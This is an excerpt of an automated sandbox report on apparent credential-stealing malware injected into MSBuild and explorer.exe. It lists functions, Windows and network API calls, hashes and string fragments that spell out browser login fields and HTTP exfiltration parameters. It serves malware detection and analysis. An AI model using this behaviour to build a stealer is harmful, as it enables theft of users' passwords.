RTL: Resource at %p, xrefs: 01AD7B8E
RTL: Re-Waiting, xrefs: 01AD7BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01AD7B7F

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: b5ac5163ce56c09734e192614d52e04966a83ed65703d97c087cce133c30d665
Instruction ID: 2ca5d07c516e2db23a20fd8242855807be03fc38b6be64033b8cf37cd2ad3aef
Opcode Fuzzy Hash: b5ac5163ce56c09734e192614d52e04966a83ed65703d97c087cce133c30d665
Instruction Fuzzy Hash: FF41F1313007029FDB24DF29D940F6AB7E5EF88710F100A1DFA5ADB680DB71E8458BA1

Function 01A9B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AD728C

Strings

RTL: Resource at %p, xrefs: 01AD72A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01AD7294
RTL: Re-Waiting, xrefs: 01AD72C1

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 142c34bd4a01476d5eac7c0ceb581eae917909d9f1ad90c450219c264947036d
Instruction ID: d57cc324decff36b11b2e6e90460fda8271541279c03dbfa5814e48c1c746ed9
Opcode Fuzzy Hash: 142c34bd4a01476d5eac7c0ceb581eae917909d9f1ad90c450219c264947036d
Instruction Fuzzy Hash: 3A410031700642ABCB25DF69CC41F6AB7E5FB94714F140619F956AB241DB30E8528BE1

Function 01B12300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01B1238D
___swprintf_l.LIBCMT ref: 01B123B3

Strings

]:%u, xrefs: 01B123AA
%%%u, xrefs: 01B12384

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: d65f1d7f960f9326be9bef81f24c5083213c3fda186fb343a7034331c1ecb03c
Instruction ID: e47786ad680efa46c29fda01e7b678dd00b40b68d1e14917e7d04c3ae330fb9a
Opcode Fuzzy Hash: d65f1d7f960f9326be9bef81f24c5083213c3fda186fb343a7034331c1ecb03c
Instruction Fuzzy Hash: C2318772A002199FDB24DF29DD80BEEB7B8EF54650F9545D5E949E3204EB30AA448B60

Function 01AA7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01AA7E8B

Strings

+, xrefs: 01AA7DE8
-, xrefs: 01AA7DDD

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: a65710ee0defefe5340e7dca734e9189d30d9b3c1e6a4b4ed3a0f2975c51d264
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: ED91B471E002169FEF24DFADC8806BFBBB9AF44721F94451AE955E72C0D7368A40CB51

Function 01A69126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 01A69175
$, xrefs: 01A69191

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 4525061853e772f985a4e4324fa9d1dca84ea31f191a178fc493dbf421798b16
Instruction ID: 7f30f6ce14a0994a82bfedd285863c35aa81a9984ebec62fbfd0b9c4673c6581
Opcode Fuzzy Hash: 4525061853e772f985a4e4324fa9d1dca84ea31f191a178fc493dbf421798b16
Instruction Fuzzy Hash: 3B810A71D00269DBDB35DB54CD44BEABBB8AB48754F0441EAEA19B7280E7705E84CFA0

Analysis Process: explorer.exePID: 4056, Parent PID: 6156COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.4%
Total number of Nodes:	79
Total number of Limit Nodes:	9

Executed Functions

Function 0E592F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 0E59312E
setsockopt.WS2_32 ref: 0E593830
recv.WS2_32 ref: 0E593859

Strings

&un=, xrefs: 0E5934F1
nnec, xrefs: 0E59332A
tion, xrefs: 0E593331
dat=, xrefs: 0E593290
&br=, xrefs: 0E593509
: cl, xrefs: 0E593338
Co, xrefs: 0E593323
&sql, xrefs: 0E593471
GET , xrefs: 0E593318
ose, xrefs: 0E59333F

Memory Dump Source

Source File: 0000000A.00000002.2476573024.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e520000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: e1f43fa1e9db09d8d3f7f4a0d8bae418d05853b55b9b36f710f19b1651dccc01
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: 24527130614A098BCF69EF68C4947E9B7E1FB94300F504E2EC5AFC7146EE34A946DB91

Function 0E592232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 0E592449

Strings

`, xrefs: 0E59241D

Memory Dump Source

Source File: 0000000A.00000002.2476573024.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e520000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: c17263e5927af7921409b735911941ccff6ccf515b0e0b574b45ea92f06e0ef7
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: 5B224B74A18A09AFCF59DF68D4946FAF7E1FB98301F404A2ED45ED3260DB30A851DB81

Function 0E593E12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0E593E67

Memory Dump Source

Source File: 0000000A.00000002.2476573024.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e520000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: bdbf35ff5b7afb6439c355896793c5e1320a13d645ca89b85c7b57409c192a90
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: D8019E34628B484F8B88EF6CA48026AB7E4FBD9214F000B3EA99AC3250EB60C9414742

Function 0E593E0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0E593E67

Memory Dump Source

Source File: 0000000A.00000002.2476573024.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e520000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: 945487beebabdc87544f29be527d76e94364efd0a5e2512ab6ac67dd5687635f
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: 6401A234628B884B8B48EB3C94412A6B7E5FBCE314F000F3EE99AC3250DB21D9024782

Function 0E58D8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0E58D9A0

Strings

User-Agent: , xrefs: 0E58D935, 0E58D948
urlmon.dll, xrefs: 0E58D959
nt: , xrefs: 0E58D91E
on.d, xrefs: 0E58D902

Memory Dump Source

Source File: 0000000A.00000002.2476573024.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e520000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: b9fce41a01f6f1f970c3d455d9f2b200ae56db4d01caac9ba670f1bad29177d6
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: B631D131614A1D8BCF44EFA8C8847EDB7E0FB98204F400A2AD55ED7240EF748A45C789

Function 0E58D8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0E58D9A0

Strings

User-Agent: , xrefs: 0E58D935, 0E58D948
urlmon.dll, xrefs: 0E58D959
nt: , xrefs: 0E58D91E
on.d, xrefs: 0E58D902

Memory Dump Source

Source File: 0000000A.00000002.2476573024.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e520000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: d1d70ad77a709fba5f61bc009e6d715e2785b358c6b569b63352ad910867a9d1
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 9821C331610A1D8ACF05EFA8C8947ED7BE4FF98204F404A2AD55AD7250DF748E45C785

Function 0E589B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexExW.KERNEL32 ref: 0E589CCA

Strings

.dll, xrefs: 0E589BCD
kern, xrefs: 0E589B99
el32, xrefs: 0E589BA0

Memory Dump Source

Source File: 0000000A.00000002.2476573024.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e520000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: 12d55630b9e37140031871e033cd6de9e4d7460a4aa17baeb3a17d6a7eaabc4d
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: 85414A70918A088FDF54EFA8C8D57ED77E0FB98301F044A6AC94EEB265DE309945CB85

Function 0E589B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexExW.KERNEL32 ref: 0E589CCA

Strings

.dll, xrefs: 0E589BCD
kern, xrefs: 0E589B99
el32, xrefs: 0E589BA0

Memory Dump Source

Source File: 0000000A.00000002.2476573024.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e520000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: 37e7e55d4de7bea00ccdc7fb3fe0644062f83f7fb0b6f151f5c4ab1a03bf1a25
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: B4413A70918A088FDF94EFA8C8D97ED77E0FBA8300F04496AC94EDB255DE309945CB85

Function 0E58F72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0E58F791

Strings

conn, xrefs: 0E58F75A
ect, xrefs: 0E58F761

Memory Dump Source

Source File: 0000000A.00000002.2476573024.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e520000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: 30df8cc219c24c75cf19802588b42137ef0949210973c34c4e32508236fa5ac2
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: 61014C30618B188FCB84EF1CE088B55B7E0FB58314F1545AA990DCB226C674D8818BC2

Function 0E58F732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0E58F791

Strings

conn, xrefs: 0E58F75A
ect, xrefs: 0E58F761

Memory Dump Source

Source File: 0000000A.00000002.2476573024.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e520000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: 49999cd8271eb1e4a75fea9e87bc2cf26ba3dd2a37c0fe6164f7553dcd0bb2a4
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: 80012C70618A1C8FCB84EF5CE088B55B7E0FB5D314F1545AEA90DCB226CA74CD818BC2

Function 0E58F6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 0E58F713

Strings

send, xrefs: 0E58F6DA

Memory Dump Source

Source File: 0000000A.00000002.2476573024.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e520000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: 8822abb2c0c7ecc2d2dba004c86460045297a05e1325a86da4deb6297353b40f
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: 47011270618A1D8FDB84EF1CE048B2577E0FB98314F1545AED85DCB266C670D8818B81

Function 0E58F5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 0E58F611

Strings

sock, xrefs: 0E58F5D9

Memory Dump Source

Source File: 0000000A.00000002.2476573024.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e520000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: 65709f2bce490559aaaf03efeafe5d653b42bb6b492cc2aef36a849b488f4e5f
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: BF01217061861C8FCB84EF1CE048B54BBE0FB59314F1545ADD45EDB276C7B0C9818B86

Function 0E5872DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0E58732D

Memory Dump Source

Source File: 0000000A.00000002.2476573024.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e520000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: edf55fbe65ac14d66f157c63be828ec1d5b52db80925d2a0be24dd036753f4da
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: 63316C74514B09DADB64AF2981882E5B7E0FB68301F644A7FCD2DDB106CB3499A0CF92

Function 0E587412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 0E587461

Memory Dump Source

Source File: 0000000A.00000002.2476573024.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e520000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: b1e80f5f39bfc7355ed38d48b6b56d632996b28feba5444240b6aa2745db375c
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: 17F0C230668A494FDB88EB2CD48567AB3D0FBE8214F444A3EA64DC3264DA29C9824716

Non-executed Functions

Function 0E46DD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

S, xrefs: 0E46E073
net., xrefs: 0E46DF44
dll, xrefs: 0E46DF4C
ll, xrefs: 0E46DF13
kern, xrefs: 0E46DF5A
user, xrefs: 0E46DF03
M, xrefs: 0E46E082
32.d, xrefs: 0E46DF0B
.dll, xrefs: 0E46DF2F
wini, xrefs: 0E46DF72
el32, xrefs: 0E46DF27

Memory Dump Source

Source File: 0000000A.00000002.2476353704.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e380000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: cd54041014bca1432764bb2f02fff16b98ce8e0b27978d76bbd99ed23ba7e939
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: 2AE135B4618B488FC764EF68C4947EBB7E1FB58301F404A2F959BC7241DF30A9418B8A

Function 107D7D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

net., xrefs: 107D7F44
S, xrefs: 107D8073
dll, xrefs: 107D7F4C
kern, xrefs: 107D7F5A
32.d, xrefs: 107D7F0B
el32, xrefs: 107D7F27
user, xrefs: 107D7F03
M, xrefs: 107D8082
ll, xrefs: 107D7F13
.dll, xrefs: 107D7F2F
wini, xrefs: 107D7F72

Memory Dump Source

Source File: 0000000A.00000002.2477117972.0000000010720000.00000040.00000001.00040000.00000000.sdmp, Offset: 10720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10720000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 9bd8b84a0906a5633db051f6ed230766b72ccaa9da37ca640455943e0ae1210a
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: 4BE15874618B488FC7A5DF68D4897AAB7E0FB58300F904A2EA59FC7241DF30A545CB89

Function 1092ED02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

ll, xrefs: 1092EF13
wini, xrefs: 1092EF72
M, xrefs: 1092F082
el32, xrefs: 1092EF27
dll, xrefs: 1092EF4C
net., xrefs: 1092EF44
kern, xrefs: 1092EF5A
S, xrefs: 1092F073
user, xrefs: 1092EF03
.dll, xrefs: 1092EF2F
32.d, xrefs: 1092EF0B

Memory Dump Source

Source File: 0000000A.00000002.2477305085.0000000010890000.00000040.80000000.00040000.00000000.sdmp, Offset: 10890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10890000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 964031ba5531b0e523f3573a765b52f44f61d8e10e01046a6c4dbea135e0751d
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: 9EE16A74618B488FC7A5DF78C4A57ABB7E0FB58301F804A2EA59BCB245DF30A541CB85

Function 0E470792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

itUR, xrefs: 0E47085D
ypte, xrefs: 0E4708DA
encr, xrefs: 0E4708D2
swor, xrefs: 0E4708EA
d, xrefs: 0E4708F2
user, xrefs: 0E470876
guid, xrefs: 0E4707CE
ypte, xrefs: 0E4708A5
e, xrefs: 0E4708BD
Subm, xrefs: 0E470855
Fiel, xrefs: 0E470884
rnam, xrefs: 0E4708B5
name, xrefs: 0E47087D
form, xrefs: 0E47084D
dUse, xrefs: 0E4708AD
dPas, xrefs: 0E4708E2
encr, xrefs: 0E47089D

Memory Dump Source

Source File: 0000000A.00000002.2476353704.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e380000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: ff57e539f099787bcecc6d83f96d06a04f107c3d11950f2c54e0a0805c845158
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 27B15930518B488EDB59EF69C489AEEB7F1FF98300F50491FD49AC7251EF70A9058B86

Function 107DA792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

user, xrefs: 107DA876
dUse, xrefs: 107DA8AD
e, xrefs: 107DA8BD
name, xrefs: 107DA87D
Subm, xrefs: 107DA855
encr, xrefs: 107DA8D2
Fiel, xrefs: 107DA884
ypte, xrefs: 107DA8A5
guid, xrefs: 107DA7CE
form, xrefs: 107DA84D
ypte, xrefs: 107DA8DA
encr, xrefs: 107DA89D
swor, xrefs: 107DA8EA
d, xrefs: 107DA8F2
itUR, xrefs: 107DA85D
rnam, xrefs: 107DA8B5
dPas, xrefs: 107DA8E2

Memory Dump Source

Source File: 0000000A.00000002.2477117972.0000000010720000.00000040.00000001.00040000.00000000.sdmp, Offset: 10720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10720000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 70568548f76cb4c9525ca6ff242f96da332cde7e12008201176a2ddb42d9b322
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 25B17A30518B488EDB55EF68D48AAEEB7F1FF98300F50491EE49AC7251EF70A445CB86

Function 10931792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

Subm, xrefs: 10931855
encr, xrefs: 109318D2
encr, xrefs: 1093189D
name, xrefs: 1093187D
swor, xrefs: 109318EA
user, xrefs: 10931876
itUR, xrefs: 1093185D
form, xrefs: 1093184D
ypte, xrefs: 109318DA
e, xrefs: 109318BD
d, xrefs: 109318F2
guid, xrefs: 109317CE
Fiel, xrefs: 10931884
rnam, xrefs: 109318B5
dPas, xrefs: 109318E2
ypte, xrefs: 109318A5
dUse, xrefs: 109318AD

Memory Dump Source

Source File: 0000000A.00000002.2477305085.0000000010890000.00000040.80000000.00040000.00000000.sdmp, Offset: 10890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10890000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: ee5194178b104b47fa7f8f6071a2146e2897a0859db1d26810e6bafb26e1e9e5
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 3EB19C70518B488EDB59DF68C496BEEB7F1FF98301F40451EE49ACB261EF70A4058B86

Function 0E46E622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

s, xrefs: 0E46E689
d, xrefs: 0E46E6CF
2, xrefs: 0E46E674
n, xrefs: 0E46E6C1
p, xrefs: 0E46E690
e, xrefs: 0E46E66D
d, xrefs: 0E46E67B
i, xrefs: 0E46E69E
l, xrefs: 0E46E682
u, xrefs: 0E46E661
d, xrefs: 0E46E6A5
n, xrefs: 0E46E6BA
t, xrefs: 0E46E6C8
c, xrefs: 0E46E697
l, xrefs: 0E46E6AC
l, xrefs: 0E46E6D6
w, xrefs: 0E46E6B3

Memory Dump Source

Source File: 0000000A.00000002.2476353704.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e380000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: 1bd1cb8b7be0b9c59b3ed270a8fdc24e3f36a627a60a8775a40b2b6f0a7aea34
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: 8B418C70A18B088FDF14DF88A4596AE7BE6EB88700F00025FD809D7345DBB59E468BD6

Function 107D8622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

